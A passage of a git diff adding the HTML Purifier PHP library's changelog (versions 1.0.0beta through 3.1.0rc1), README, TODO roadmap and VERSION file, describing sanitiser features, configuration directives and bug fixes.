clone instead +. More extensive unit tests for HTMLDefinition +. assertPurification moved to central harness +. HTMLPurifier_Generator accepts $config and $context parameters during + instantiation, not runtime +. Double-quotes outside of attribute values are now unescaped + +3.1.0rc1, released 2008-04-22 +# Autoload support added. Internal require_once's removed in favor of an + explicit require list or autoloading. To use HTML Purifier, + you must now either use HTMLPurifier.auto.php + or HTMLPurifier.includes.php; setting the include path and including + HTMLPurifier.php is insufficient--in such cases include HTMLPurifier.autoload.php + as well to register our autoload handler (or modify your autoload function + to check HTMLPurifier_Bootstrap::getPath($class)). You can also use + HTMLPurifier.safe-includes.php for a less performance friendly but more + user-friendly library load. +# HTMLPurifier_ConfigSchema static functions are officially deprecated. Schema + information is stored in the ConfigSchema directory, and the + maintenance/generate-schema-cache.php generates the schema.ser file, which + is now instantiated. Support for userland schema changes coming soon! +# HTMLPurifier_Config will now throw E_USER_NOTICE when you use a directive + alias; to get rid of these errors just modify your configuration to use + the new directive name. +# HTMLPurifier->addFilter is deprecated; built-in filters can now be + enabled using %Filter.$filter_name or by setting your own filters using + %Filter.Custom +# Directive-level safety properties superceded in favor of module-level + safety. Internal method HTMLModule->addElement() has changed, although + the externally visible HTMLDefinition->addElement has *not* changed. +! Extra utility classes for testing and non-library operations can + be found in extras/. Specifically, these are FSTools and ConfigDoc. + You may find a use for these in your own project, but right now they + are highly experimental and volatile. +! Integration with PHPT allows for automated smoketests +! Limited support for proprietary HTML elements, namely <marquee>, sponsored + by Chris. You can enable them with %HTML.Proprietary if your client + demands them. +! Support for !important CSS cascade modifier. By default, this will be stripped + from CSS, but you can enable it using %CSS.AllowImportant +! Support for display and visibility CSS properties added, set %CSS.AllowTricky + to true to use them. +! HTML Purifier now has its own Exception hierarchy under HTMLPurifier_Exception. + Developer error (not enduser error) can cause these to be triggered. +! Experimental kses() wrapper introduced with HTMLPurifier.kses.php +! Finally %CSS.AllowedProperties for tweaking allowed CSS properties without + mucking around with HTMLPurifier_CSSDefinition +! ConfigDoc output has been enhanced with version and deprecation info. +! %HTML.ForbiddenAttributes and %HTML.ForbiddenElements implemented. +- Autoclose now operates iteratively, i.e. <span><span><div> now has + both span tags closed. +- Various HTMLPurifier_Config convenience functions now accept another parameter + $schema which defines what HTMLPurifier_ConfigSchema to use besides the + global default. +- Fix bug with trusted script handling in libxml versions later than 2.6.28. +- Fix bug in ExtractStyleBlocks with comments in style tags +- Fix bug in comment parsing for DirectLex +- Flush output now displayed when in command line mode for unit tester +- Fix bug with rgb(0, 1, 2) color syntax with spaces inside shorthand syntax +- HTMLPurifier_HTMLDefinition->addAttribute can now be called multiple times + on the same element without emitting errors. +- Fixed fatal error in PH5P lexer with invalid tag names +. Plugins now get their own changelogs according to project conventions. +. Convert tokens to use instanceof, reducing memory footprint and + improving comparison speed. +. Dry runs now supported in SimpleTest; testing facilities improved +. Bootstrap class added for handling autoloading functionality +. Implemented recursive glob at FSTools->globr +. ConfigSchema now has instance methods for all corresponding define* + static methods. +. A couple of new historical maintenance scripts were added. +. HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php split into two files +. tests/index.php can now be run from any directory. +. HTMLPurifier_Token subclasses split into seperate files +. HTMLPURIFIER_PREFIX now is defined in Bootstrap.php, NOT HTMLPurifier.php +. HTMLPURIFIER_PREFIX can now be defined outside of HTML Purifier +. New --php=php flag added, allows PHP executable to be specified (command + line only!) +. htmlpurifier_add_test() preferred method to translate test files in to + classes, because it handles PHPT files too. +. Debugger class is deprecated and will be removed soon. +. Command line argument parsing for testing scripts revamped, now --opt value + format is supported. +. Smoketests now cleanup after magic quotes +. Generator now can output comments (however, comments are still stripped + from HTML Purifier output) +. HTMLPurifier_ConfigSchema->validate() deprecated in favor of + HTMLPurifier_VarParser->parse() +. Integers auto-cast into float type by VarParser. +. HTMLPURIFIER_STRICT removed; no validation is performed on runtime, only + during cache generation +. Reordered script calls in maintenance/flush.php +. Command line scripts now honor exit codes +. When --flush fails in unit testers, abort tests and print message +. Improved documentation in docs/dev-flush.html about the maintenance scripts +. copy() methods removed in favor of clone keyword + +3.0.0, released 2008-01-06 +# HTML Purifier is PHP 5 only! The 2.1.x branch will be maintained + until PHP 4 is completely deprecated, but no new features will be added + to it. + + Visibility declarations added + + Constructor methods renamed to __construct() + + PHP4 reference cruft removed (in progress) +! CSS properties are now case-insensitive +! DefinitionCacheFactory now can register new implementations +! New HTMLPurifier_Filter_ExtractStyleBlocks for extracting <style> from + documents and cleaning their contents up. Requires the CSSTidy library + <http://csstidy.sourceforge.net/>. You can access the blocks with the + 'StyleBlocks' Context variable ($purifier->context->get('StyleBlocks')). + The output CSS can also be "scoped" for a specific element, use: + %Filter.ExtractStyleBlocksScope +! Experimental support for some proprietary CSS attributes allowed: + opacity (and all of the browser-specific equivalents) and scrollbar colors. + Enable by setting %CSS.Proprietary to true. +- Colors missing # but in hex form will be corrected +- CSS Number algorithm improved +- Unit testing and multi-testing now on steroids: command lines, + XML output, and other goodies now added. +. Unit tests for Injector improved +. New classes: + + HTMLPurifier_AttrDef_CSS_AlphaValue + + HTMLPurifier_AttrDef_CSS_Filter +. Multitest now has a file docblock + +2.1.3, released 2007-11-05 +! tests/multitest.php allows you to test multiple versions by running + tests/index.php through multiple interpreters using `phpv` shell + script (you must provide this script!) +- Fixed poor include ordering for Email URI AttrDefs, causes fatal errors + on some systems. +- Injector algorithm further refined: off-by-one error regarding skip + counts for dormant injectors fixed +- Corrective blockquote definition now enabled for HTML 4.01 Strict +- Fatal error when <img> tag (or any other element with required attributes) + has 'id' attribute fixed, thanks NykO18 for reporting +- Fix warning emitted when a non-supported URI scheme is passed to the + MakeAbsolute URIFilter, thanks NykO18 (again) +- Further refine AutoParagraph injector. Behavior inside of elements + allowing paragraph tags clarified: only inline content delimeted by + double newlines (not block elements) are paragraphed. +- Buggy treatment of end tags of elements that have required attributes + fixed (does not manifest on default tag-set) +- Spurious internal content reorganization error suppressed +- HTMLDefinition->addElement now returns a reference to the created + element object, as implied by the documentation +- Phorum mod's HTML Purifier help message expanded (unreleased elsewhere) +- Fix a theoretical class of infinite loops from DirectLex reported + by Nate Abele +- Work around unnecessary DOMElement type-cast in PH5P that caused errors + in PHP 5.1 +- Work around PHP 4 SimpleTest lack-of-error complaining for one-time-only + HTMLDefinition errors, this may indicate problems with error-collecting + facilities in PHP 5 +- Make ErrorCollectorEMock work in both PHP 4 and PHP 5 +- Make PH5P work with PHP 5.0 by removing unnecessary array parameter typedef +. %Core.AcceptFullDocuments renamed to %Core.ConvertDocumentToFragment + to better communicate its purpose +. Error unit tests can now specify the expectation of no errors. Future + iterations of the harness will be extremely strict about what errors + are allowed +. Extend Injector hooks to allow for more powerful injector routines +. HTMLDefinition->addBlankElement created, as according to the HTMLModule + method +. Doxygen configuration file updated, with minor improvements +. Test runner now checks for similarly named files in conf/ directory too. +. Minor cosmetic change to flush-definition-cache.php: trailing newline is + outputted +. Maintenance script for generating PH5P patch added, original PH5P source + file also added under version control +. Full unit test runner script title made more descriptive with PHP version +. Updated INSTALL file to state that 4.3.7 is the earliest version we + are actively testing + +2.1.2, released 2007-09-03 +! Implemented Object module for trusted users +! Implemented experimental HTML5 parsing mode using PH5P. To use, add + this to your code: + require_once 'HTMLPurifier/Lexer/PH5P.php'; + $config->set('Core', 'LexerImpl', 'PH5P'); + Note that this Lexer introduces some classes not in the HTMLPurifier + namespace. Also, this is PHP5 only. +! CSS property border-spacing implemented +- Fix non-visible parsing error in DirectLex with empty tags that have + slashes inside attribute values. +- Fix typo in CSS definition: border-collapse:seperate; was incorrectly + accepted as valid CSS. Usually non-visible, because this styling is the + default for tables in most browsers. Thanks Brett Zamir for pointing + this out. +- Fix validation errors in configuration form +- Hammer out a bunch of edge-case bugs in the standalone distribution +- Inclusion reflection removed from URISchemeRegistry; you must manually + include any new schema files you wish to use +- Numerous typo fixes in documentation thanks to Brett Zamir +. Unit test refactoring for one logical test per test function +. Config and context parameters in ComplexHarness deprecated: instead, edit + the $config and $context member variables +. HTML wrapper in DOMLex now takes DTD identifiers into account; doesn't + really make a difference, but is good for completeness sake +. merge-library.php script refactored for greater code reusability and + PHP4 compatibility + +2.1.1, released 2007-08-04 +- Fix show-stopper bug in %URI.MakeAbsolute functionality +- Fix PHP4 syntax error in standalone version +. Add prefix directory to include path for standalone, this prevents + other installations from clobbering the standalone's URI schemes +. Single test methods can be invoked by prefixing with __only + +2.1.0, released 2007-08-02 +# flush-htmldefinition-cache.php superseded in favor of a generic + flush-definition-cache.php script, you can clear a specific cache + by passing its name as a parameter to the script +! Phorum mod implemented for HTML Purifier +! With %Core.AggressivelyFixLt, <3 and similar emoticons no longer + trigger HTML removal in PHP5 (DOMLex). This directive is not necessary + for PHP4 (DirectLex). +! Standalone file now available, which greatly reduces the amount of + includes (although there are still a few files that reside in the + standalone folder) +! Relative URIs can now be transformed into their absolute equivalents + using %URI.Base and %URI.MakeAbsolute +! Ruby implemented for XHTML 1.1 +! You can now define custom URI filtering behavior, see enduser-uri-filter.html + for more details +! UTF-8 font names now supported in CSS +- AutoFormatters emit friendly error messages if tags or attributes they + need are not allowed +- ConfigForm's compactification of directive names is now configurable +- AutoParagraph autoformatter algorithm refined after field-testing +- XHTML 1.1 now applies XHTML 1.0 Strict cleanup routines, namely + blockquote wrapping +- Contents of <style> tags removed by default when tags are removed +. HTMLPurifier_Config->getSerial() implemented, this is extremely useful + for output cache invalidation +. ConfigForm printer now can retrieve CSS and JS files as strings, in + case HTML Purifier's directory is not publically accessible +. Introduce new text/itext configuration directive values: these represent + longer strings that would be more appropriately edited with a textarea +. Allow newlines to act as separators for lists, hashes, lookups and + %HTML.Allowed +. ConfigForm generates textareas instead of text inputs for lists, hashes, + lookups, text and itext fields +. Hidden element content removal genericized: %Core.HiddenElements can + be used to customize this behavior, by default <script> and <style> are + hidden +. Added HTMLPURIFIER_PREFIX constant, should be used instead of dirname(__FILE__) +. Custom ChildDef added to default include list +. URIScheme reflection improved: will not attempt to include file if class + already exists. May clobber autoload, so I need to keep an eye on it +. ConfigSchema heavily optimized, will only collect information and validate + definitions when HTMLPURIFIER_SCHEMA_STRICT is true. +. AttrDef_URI unit tests and implementation refactored +. benchmarks/ directory now protected from public view with .htaccess file; + run the tests via command line +. URI scheme is munged off if there is no authority and the scheme is the + default one +. All unit tests inherit from HTMLPurifier_Harness, not UnitTestCase +. Interface for URIScheme changed +. Generic URI object to hold components of URI added, most systems involved + in URI validation have been migrated to use it +. Custom filtering for URIs factored out to URIDefinition interface for + maximum extensibility + +2.0.1, released 2007-06-27 +! Tag auto-closing now based on a ChildDef heuristic rather than a + manually set auto_close array; some behavior may change +! Experimental AutoFormat functionality added: auto-paragraph and + linkify your HTML input by setting %AutoFormat.AutoParagraph and + %AutoFormat.Linkify to true +! Newlines normalized internally, and then converted back to the + value of PHP_EOL. If this is not desired, set your newline format + using %Output.Newline. +! Beta error collection, messages are implemented for the most generic + cases involving Lexing or Strategies +- Clean up special case code for <script> tags +- Reorder includes for DefinitionCache decorators, fixes a possible + missing class error +- Fixed bug where manually modified definitions were not saved via cache + (mostly harmless, except for the fact that it would be a little slower) +- Configuration objects with different serials do not clobber each + others when revision numbers are unequal +- Improve Serializer DefinitionCache directory permissions checks +- DefinitionCache no longer throws errors when it encounters old + serial files that do not conform to the current style +- Stray xmlns attributes removed from configuration documentation +- configForm.php smoketest no longer has XSS vulnerability due to + unescaped print_r output +- Printer adheres to configuration's directives on output format +- Fix improperly named form field in ConfigForm printer +. Rewire some test-cases to swallow errors rather than expect them +. HTMLDefinition printer updated with some of the new attributes +. DefinitionCache keys reordered to reflect precedence: version number, + hash, then revision number +. %Core.DefinitionCache renamed to %Cache.DefinitionImpl +. Interlinking in configuration documentation added using + Injector_PurifierLinkify +. Directives now keep track of aliases to themselves +. Error collector now requires a severity to be passed, use PHP's internal + error constants for this +. HTMLPurifier_Config::getAllowedDirectivesForForm implemented, allows + much easier selective embedding of configuration values +. Doctype objects now accept public and system DTD identifiers +. %HTML.Doctype is now constrained by specific values, to specify a custom + doctype use new %HTML.CustomDoctype +. ConfigForm truncates long directives to keep the form small, and does + not re-output namespaces + +2.0.0, released 2007-06-20 +# Completely refactored HTMLModuleManager, decentralizing safety + information +# Transform modules changed to Tidy modules, which offer more flexibility + and better modularization +# Configuration object now finalizes itself when a read operation is + performed on it, ensuring that its internal state stays consistent. + To revert this behavior, you can set the $autoFinalize member variable + off, but it's not recommended. +# New compact syntax for AttrDef objects that can be used to instantiate + new objects via make() +# Definitions (esp. HTMLDefinition) are now cached for a significant + performance boost. You can disable caching by setting %Core.DefinitionCache + to null. You CANNOT edit raw definitions without setting the corresponding + DefinitionID directive (%HTML.DefinitionID for HTMLDefinition). +# Contents between <script> tags are now completely removed if <script> + is not allowed +# Prototype-declarations for Lexer removed in favor of configuration + determination of Lexer implementations. +! HTML Purifier now works in PHP 4.3.2. +! Configuration form-editing API makes tweaking HTMLPurifier_Config a + breeze! +! Configuration directives that accept hashes now allow new string + format: key1:value1,key2:value2 +! ConfigDoc now factored into OOP design +! All deprecated elements now natively supported +! Implement TinyMCE styled whitelist specification format in + %HTML.Allowed +! Config object gives more friendly error messages when things go wrong +! Advanced API implemented: easy functions for creating elements (addElement) + and attributes (addAttribute) on HTMLDefinition +! Add native support for required attributes +- Deprecated and removed EnableRedundantUTF8Cleaning. It didn't even work! +- DOMLex will not emit errors when a custom error handler that does not + honor error_reporting is used +- StrictBlockquote child definition refrains from wrapping whitespace + in tags now. +- Bug resulting from tag transforms to non-allowed elements fixed +- ChildDef_Custom's regex generation has been improved, removing several + false positives +. Unit test for ElementDef created, ElementDef behavior modified to + be more flexible +. Added convenience functions for HTMLModule constructors +. AttrTypes now has accessor functions that should be used instead + of directly manipulating info +. TagTransform_Center deprecated in favor of generic TagTransform_Simple +. Add extra protection in AttrDef_URI against phantom Schemes +. Doctype object added to HTMLDefinition which describes certain aspects + of the operational document type +. Lexer is now pre-emptively included, with a conditional include for the + PHP5 only version. +. HTMLDefinition and CSSDefinition have a common parent class: Definition. +. DirectLex can now track line-numbers +. Preliminary error collector is in place, although no code actually reports + errors yet +. Factor out most of ValidateAttributes to new AttrValidator class + +1.6.1, released 2007-05-05 +! Support for more deprecated attributes via transformations: + + hspace and vspace in img + + size and noshade in hr + + nowrap in td + + clear in br + + align in caption, table, img and hr + + type in ul, ol and li +! DirectLex now preserves text in which a < bracket is followed by + a non-alphanumeric character. This means that certain emoticons + are now preserved. +! %Core.RemoveInvalidImg is now operational, when set to false invalid + images will hang around with an empty src +! target attribute in a tag supported, use %Attr.AllowedFrameTargets + to enable +! CSS property white-space now allows nowrap (supported in all modern + browsers) but not others (which have spotty browser implementations) +! XHTML 1.1 mode now sort-of works without any fatal errors, and + lang is now moved over to xml:lang. +! Attribute transformation smoketest available at smoketests/attrTransform.php +! Transformation of font's size attribute now handles super-large numbers +- Possibly fatal bug with __autoload() fixed in module manager +- Invert HTMLModuleManager->addModule() processing order to check + prefixes first and then the literal module +- Empty strings get converted to empty arrays instead of arrays with + an empty string in them. +- Merging in attribute lists now works. +. Demo script removed: it has been added to the website's repository +. Basic.php script modified to work out of the box +. Refactor AttrTransform classes to reduce duplication +. AttrTransform_TextAlign axed in favor of a more general + AttrTransform_EnumToCSS, refer to HTMLModule/TransformToStrict.php to + see how the new equivalent is implemented +. Unit tests now use exclusively assertIdentical + +1.6.0, released 2007-04-01 +! Support for most common deprecated attributes via transformations: + + bgcolor in td, th, tr and table + + border in img + + name in a and img + + width in td, th and hr + + height in td, th +! Support for CSS attribute 'height' added +! Support for rel and rev attributes in a tags added, use %Attr.AllowedRel + and %Attr.AllowedRev to activate +- You can define ID blacklists using regular expressions via + %Attr.IDBlacklistRegexp +- Error messages are emitted when you attempt to "allow" elements or + attributes that HTML Purifier does not support +- Fix segfault in unit test. The problem is not very reproduceable and + I don't know what causes it, but a six line patch fixed it. + +1.5.0, released 2007-03-23 +! Added a rudimentary I18N and L10N system modeled off MediaWiki. It + doesn't actually do anything yet, but keep your eyes peeled. +! docs/enduser-utf8.html explains how to use UTF-8 and HTML Purifier +! Newly structured HTMLDefinition modeled off of XHTML 1.1 modules. + I am loathe to release beta quality APIs, but this is exactly that; + don't use the internal interfaces if you're not willing to do migration + later on. +- Allow 'x' subtag in language codes +- Fixed buggy chameleon-support for ins and del +. Added support for IDREF attributes (i.e. for) +. Renamed HTMLPurifier_AttrDef_Class to HTMLPurifier_AttrDef_Nmtokens +. Removed context variable ParentType, replaced with IsInline, which + is false when you're not inline and an integer of the parent that + caused you to become inline when you are (so possibly zero) +. Removed ElementDef->type in favor of ElementDef->descendants_are_inline + and HTMLDefinition->content_sets +. StrictBlockquote now reports what elements its supposed to allow, + rather than what it does allow +. Removed HTMLDefinition->info_flow_elements in favor of + HTMLDefinition->content_sets['Flow'] +. Removed redundant "exclusionary" definitions from DTD roster +. StrictBlockquote now requires a construction parameter as if it + were an Required ChildDef, this is the "real" set of allowed elements +. AttrDef partitioned into HTML, CSS and URI segments +. Modify Youtube filter regexp to be multiline +. Require both PHP5 and DOM extension in order to use DOMLex, fixes + some edge cases where a DOMDocument class exists in a PHP4 environment + due to DOM XML extension. + +1.4.1, released 2007-01-21 +! docs/enduser-youtube.html updated according to new functionality +- YouTube IDs can have underscores and dashes + +1.4.0, released 2007-01-21 +! Implemented list-style-image, URIs now allowed in list-style +! Implemented background-image, background-repeat, background-attachment + and background-position CSS properties. Shorthand property background + supports all of these properties. +! Configuration documentation looks nicer +! Added %Core.EscapeNonASCIICharacters to workaround loss of Unicode + characters while %Core.Encoding is set to a non-UTF-8 encoding. +! Support for configuration directive aliases added +! Config object can now be instantiated from ini files +! YouTube preservation code added to the core, with two lines of code + you can add it as a filter to your code. See smoketests/preserveYouTube.php + for sample code. +! Moved SLOW to docs/enduser-slow.html and added code examples +- Replaced version check with functionality check for DOM (thanks Stephen + Khoo) +. Added smoketest 'all.php', which loads all other smoketests via frames +. Implemented AttrDef_CSSURI for url(http://google.com) style declarations +. Added convenient single test selector form on test runner + +1.3.2, released 2006-12-25 +! HTMLPurifier object now accepts configuration arrays, no need to manually + instantiate a configuration object +! Context object now accessible to outside +! Added enduser-youtube.html, explains how to embed YouTube videos. See + also corresponding smoketest preserveYouTube.php. +! Added purifyArray(), which takes a list of HTML and purifies it all +! Added static member variable $version to HTML Purifier with PHP-compatible + version number string. +- Fixed fatal error thrown by upper-cased language attributes +- printDefinition.php: added labels, added better clarification +. HTMLPurifier_Config::create() added, takes mixed variable and converts into + a HTMLPurifier_Config object. + +1.3.1, released 2006-12-06 +! Added HTMLPurifier.func.php stub for a convenient function to call the library +- Fixed bug in RemoveInvalidImg code that caused all images to be dropped + (thanks to .mario for reporting this) +. Standardized all attribute handling variables to attr, made it plural + +1.3.0, released 2006-11-26 +# Invalid images are now removed, rather than replaced with a dud + <img src="" alt="Invalid image" />. Previous behavior can be restored + with new directive %Core.RemoveInvalidImg set to false. +! (X)HTML Strict now supported + + Transparently handles inline elements in block context (blockquote) +! Added GET method to demo for easier validation, added 50kb max input size +! New directive %HTML.BlockWrapper, for block-ifying inline elements +! New directive %HTML.Parent, allows you to only allow inline content +! New directives %HTML.AllowedElements and %HTML.AllowedAttributes to let + users narrow the set of allowed tags +! <li value="4"> and <ul start="2"> now allowed in loose mode +! New directives %URI.DisableExternalResources and %URI.DisableResources +! New directive %Attr.DisableURI, which eliminates all hyperlinking +! New directive %URI.Munge, munges URI so you can use some sort of redirector + service to avoid PageRank leaks or warn users that they are exiting your site. +! Added spiffy new smoketest printDefinition.php, which lets you twiddle with + the configuration settings and see how the internal rules are affected. +! New directive %URI.HostBlacklist for blocking links to bad hosts. + xssAttacks.php smoketest updated accordingly. +- Added missing type to ChildDef_Chameleon +- Remove Tidy option from demo if there is not Tidy available +. ChildDef_Required guards against empty tags +. Lookup table HTMLDefinition->info_flow_elements added +. Added peace-of-mind variable initialization to Strategy_FixNesting +. Added HTMLPurifier->info_parent_def, parent child processing made special +. Added internal documents briefly summarizing future progression of HTML +. HTMLPurifier_Config->getBatch($namespace) added +. More lenient casting to bool from string in HTMLPurifier_ConfigSchema +. Refactored ChildDef classes into their own files + +1.2.0, released 2006-11-19 +# ID attributes now disabled by default. New directives: + + %HTML.EnableAttrID - restores old behavior by allowing IDs + + %Attr.IDPrefix - %Attr.IDBlacklist alternative that munges all user IDs + so that they don't collide with your IDs + + %Attr.IDPrefixLocal - Same as above, but for when there are multiple + instances of user content on the page + + Profuse documentation on how to use these available in docs/enduser-id.txt +! Added MODx plugin <http://modxcms.com/forums/index.php/topic,6604.0.html> +! Added percent encoding normalization +! XSS attacks smoketest given facelift +! Configuration documentation now has table of contents +! Added %URI.DisableExternal, which prevents links to external websites. You + can also use %URI.Host to permit absolute linking to subdomains +! Non-accessible resources (ex. mailto) blocked from embedded URIs (img src) +- Type variable in HTMLDefinition was not being set properly, fixed +- Documentation updated + + TODO added request Phalanger + + TODO added request Native compression + + TODO added request Remove redundant tags + + TODO added possible plaintext formatter for HTML Purifier documentation + + Updated ConfigDoc TODO + + Improved inline comments in AttrDef/Class.php, AttrDef/CSS.php + and AttrDef/Host.php + + Revamped documentation into HTML, along with misc updates +- HTMLPurifier_Context doesn't throw a variable reference error if you attempt + to retrieve a non-existent variable +. Switched to purify()-wide Context object registry +. Refactored unit tests to minimize duplication +. XSS attack sheet updated +. configdoc.xml now has xml:space attached to default value nodes +. Allow configuration directives to permit null values +. Cleaned up test-cases to remove unnecessary swallowErrors() + +1.1.2, released 2006-09-30 +! Add HTMLPurifier.auto.php stub file that configures include_path +- Documentation updated + + INSTALL document rewritten + + TODO added semi-lossy conversion + + API Doxygen docs' file exclusions updated + + Added notes on HTML versus XML attribute whitespace handling + + Noted that HTMLPurifier_ChildDef_Custom isn't being used + + Noted that config object's definitions are cached versions +- Fixed lack of attribute parsing in HTMLPurifier_Lexer_PEARSax3 +- ftp:// URIs now have their typecodes checked +- Hooked up HTMLPurifier_ChildDef_Custom's unit tests (they weren't being run) +. Line endings standardized throughout project (svn:eol-style standardized) +. Refactored parseData() to general Lexer class +. Tester named "HTML Purifier" not "HTMLPurifier" + +1.1.1, released 2006-09-24 +! Configuration option to optionally Tidy up output for indentation to make up + for dropped whitespace by DOMLex (pretty-printing for the entire application + should be done by a page-wide Tidy) +- Various documentation updates +- Fixed parse error in configuration documentation script +- Fixed fatal error in benchmark scripts, slightly augmented +- As far as possible, whitespace is preserved in-between table children +- Sample test-settings.php file included + +1.1.0, released 2006-09-16 +! Directive documentation generation using XSLT +! XHTML can now be turned off, output becomes <br> +- Made URI validator more forgiving: will ignore leading and trailing + quotes, apostrophes and less than or greater than signs. +- Enforce alphanumeric namespace and directive names for configuration. +- Table child definition made more flexible, will fix up poorly ordered elements +. Renamed ConfigDef to ConfigSchema + +1.0.1, released 2006-09-04 +- Fixed slight bug in DOMLex attribute parsing +- Fixed rejection of case-insensitive configuration values when there is a + set of allowed values. This manifested in %Core.Encoding. +- Fixed rejection of inline style declarations that had lots of extra + space in them. This manifested in TinyMCE. + +1.0.0, released 2006-09-01 +! Shorthand CSS properties implemented: font, border, background, list-style +! Basic color keywords translated into hexadecimal values +! Table CSS properties implemented +! Support for charsets other than UTF-8 (defined by iconv) +! Malformed UTF-8 and non-SGML character detection and cleaning implemented +- Fixed broken numeric entity conversion +- API documentation completed +. (HTML|CSS)Definition de-singleton-ized + +1.0.0beta, released 2006-08-16 +! First public release, most functionality implemented. Notable omissions are: + + Shorthand CSS properties + + Table CSS properties + + Deprecated attribute transformations + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/README b/lib/htmlpurifier/README new file mode 100644 index 000000000..53f26f1c2 --- /dev/null +++ b/lib/htmlpurifier/README @@ -0,0 +1,24 @@ + +README + All about HTML Purifier + +HTML Purifier is an HTML filtering solution that uses a unique combination +of robust whitelists and agressive parsing to ensure that not only are +XSS attacks thwarted, but the resulting HTML is standards compliant. + +HTML Purifier is oriented towards richly formatted documents from +untrusted sources that require CSS and a full tag-set. This library can +be configured to accept a more restrictive set of tags, but it won't be +as efficient as more bare-bones parsers. It will, however, do the job +right, which may be more important. + +Places to go: + +* See INSTALL for a quick installation guide +* See docs/ for developer-oriented documentation, code examples and + an in-depth installation guide. +* See WYSIWYG for information on editors like TinyMCE and FCKeditor + +HTML Purifier can be found on the web at: http://htmlpurifier.org/ + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/TODO b/lib/htmlpurifier/TODO new file mode 100644 index 000000000..b79e47da2 --- /dev/null +++ b/lib/htmlpurifier/TODO @@ -0,0 +1,149 @@ + +TODO List + += KEY ==================== + # Flagship + - Regular + ? Maybe I'll Do It +========================== + +If no interest is expressed for a feature that may require a considerable +amount of effort to implement, it may get endlessly delayed. Do not be +afraid to cast your vote for the next feature to be implemented! + +Things to do as soon as possible: + + - Think about allowing explicit order of operations hooks for transforms + - Fix "<.<" bug (trailing < is removed if not EOD) + - Build in better internal state dumps and debugging tools for remote + debugging + - Allowed/Allowed* have strange interactions when both set + ? Transform lone embeds into object tags + - Deprecated config options that emit warnings when you set them (with' + a way of muting the warning if you really want to) + - Make HTML.Trusted work with Output.FlashCompat + - HTML.Trusted and HTML.SafeObject have funny interaction; general + problem is what to do when a module "supersedes" another + (see also tables and basic tables.) This is a little dicier + because HTML.SafeObject has some extra functionality that + trusted might find useful. See http://htmlpurifier.org/phorum/read.php?3,5762,6100 + +FUTURE VERSIONS +--------------- + +4.5 release [OMG CONFIG PONIES] + ! Fix Printer. It's from the old days when we didn't have decent XML classes + ! Factor demo.php into a set of Printer classes, and then create a stub + file for users here (inside the actual HTML Purifier library) + - Fix error handling with form construction + - Do encoding validation in Printers, or at least, where user data comes in + - Config: Add examples to everything (make built-in which also automatically + gives output) + - Add "register" field to config schemas to eliminate dependence on + naming conventions (try to remember why we ultimately decided on tihs) + +5.0 release [HTML 5] + # Swap out code to use html5lib tokenizer and tree-builder + ! Allow turning off of FixNesting and required attribute insertion + +5.1 release [It's All About Trust] (floating) + # Implement untrusted, dangerous elements/attributes + # Implement IDREF support (harder than it seems, since you cannot have + IDREFs to non-existent IDs) + - Implement <area> (client and server side image maps are blocking + on IDREF support) + # Frameset XHTML 1.0 and HTML 4.01 doctypes + - Figure out how to simultaneously set %CSS.Trusted and %HTML.Trusted (?) + +5.2 release [Error'ed] + # Error logging for filtering/cleanup procedures + # Additional support for poorly written HTML + - Microsoft Word HTML cleaning (i.e. MsoNormal, but research essential!) + - Friendly strict handling of <address> (block -> <br>) + - XSS-attempt detection--certain errors are flagged XSS-like + - Append something to duplicate IDs so they're still usable (impl. note: the + dupe detector would also need to detect the suffix as well) + +6.0 release [Beyond HTML] + # Legit token based CSS parsing (will require revamping almost every + AttrDef class). Probably will use CSSTidy + # More control over allowed CSS properties using a modularization + # IRI support (this includes IDN) + - Standardize token armor for all areas of processing + +7.0 release [To XML and Beyond] + - Extended HTML capabilities based on namespacing and tag transforms (COMPLEX) + - Hooks for adding custom processors to custom namespaced tags and + attributes, offer default implementation + - Lots of documentation and samples + +Ongoing + - More refactoring to take advantage of PHP5's facilities + - Refactor unit tests into lots of test methods + - Plugins for major CMSes (COMPLEX) + - phpBB + - Also, a FAQ for extension writers with HTML Purifier + +AutoFormat + - Smileys + - Syntax highlighting (with GeSHi) with <pre> and possibly <?php + - Look at http://drupal.org/project/Modules/category/63 for ideas + +Neat feature related + ! Support exporting configuration, so users can easily tweak settings + in the demo, and then copy-paste into their own setup + - Advanced URI filtering schemes (see docs/proposal-new-directives.txt) + - Allow scoped="scoped" attribute in <style> tags; may be troublesome + because regular CSS has no way of uniquely identifying nodes, so we'd + have to generate IDs + - Explain how to use HTML Purifier in non-PHP languages / create + a simple command line stub (or complicated?) + - Fixes for Firefox's inability to handle COL alignment props (Bug 915) + - Automatically add non-breaking spaces to empty table cells when + empty-cells:show is applied to have compatibility with Internet Explorer + - Table of Contents generation (XHTML Compiler might be reusable). May also + be out-of-band information. + - Full set of color keywords. Also, a way to add onto them without + finalizing the configuration object. + - Write a var_export and memcached DefinitionCache - Denis + - Built-in support for target="_blank" on all external links + - Convert RTL/LTR override characters to <bdo> tags, or vice versa on demand. + Also, enable disabling of directionality + ? Externalize inline CSS to promote clean HTML, proposed by Sander Tekelenburg + ? Remove redundant tags, ex. <u><u>Underlined</u></u>. Implementation notes: + 1. Analyzing which tags to remove duplicants + 2. Ensure attributes are merged into the parent tag + 3. Extend the tag exclusion system to specify whether or not the + contents should be dropped or not (currently, there's code that could do + something like this if it didn't drop the inner text too.) + ? Make AutoParagraph also support paragraph-izing double <br> tags, and not + just double newlines. This is kind of tough to do in the current framework, + though, and might be reasonably approximated by search replacing double <br>s + with newlines before running it through HTML Purifier. + +Maintenance related (slightly boring) + # CHMOD install script for PEAR installs + ! Factor out command line parser into its own class, and unit test it + - Reduce size of internal data-structures (esp. HTMLDefinition) + - Allow merging configurations. Thus, + a -> b -> default + c -> d -> default + becomes + a -> b -> c -> d -> default + Maybe allow more fine-grained tuning of this behavior. Alternatively, + encourage people to use short plist depths before building them up. + - Time PHPT tests + +ChildDef related (very boring) + - Abstract ChildDef_BlockQuote to work with all elements that only + allow blocks in them, required or optional + - Implement lenient <ruby> child validation + +Wontfix + - Non-lossy smart alternate character encoding transformations (unless + patch provided) + - Pretty-printing HTML: users can use Tidy on the output on entire page + - Native content compression, whitespace stripping: use gzip if this is + really important + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/VERSION b/lib/htmlpurifier/VERSION new file mode 100644 index 000000000..64b5ae393 --- /dev/null +++ b/lib/htmlpurifier/VERSION @@ -0,0 +1 @@ +4.4.0
